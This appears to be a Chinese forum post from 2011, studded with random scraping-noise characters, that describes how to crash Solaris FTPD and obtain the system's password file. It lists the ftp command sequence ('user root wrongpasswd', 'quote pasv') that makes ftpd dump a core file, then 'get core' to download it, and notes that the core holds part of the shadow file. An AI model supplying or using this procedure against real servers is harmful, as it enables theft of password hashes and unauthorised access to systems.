该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:1 _! o" ~0 O% K8 I
- t* r4 a2 ]9 Q. @0 `, Y1.通过 ftp 正常登录到目的主机上, a+ {! X5 {! c1 F# v6 X3 Y
8 F$ \9 z* ?- s6 [* s! N
2.输入如下命令序列:- E9 F1 O' G, i; m
. G9 V7 |1 @: | f) r( Z. R
ftp> user root wrongpasswd& T5 l5 k" s8 |+ y" I8 C
5 T7 |# w. a$ i* }7 S/ F# Jftp> quote pasv5 _" |* J2 y3 e+ w/ Q$ v
3 y6 a+ {6 a! z. c3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
' Y4 P! M$ _( t9 T
' M- N/ [; U, C k% l4.再次进入FTP >get core! @: _# Z \2 V
% |0 y" ?! I9 p! M& e5 \& f
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
7 g3 x' R# g9 c
5 h4 f4 U) Z" ~) f4 Z |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡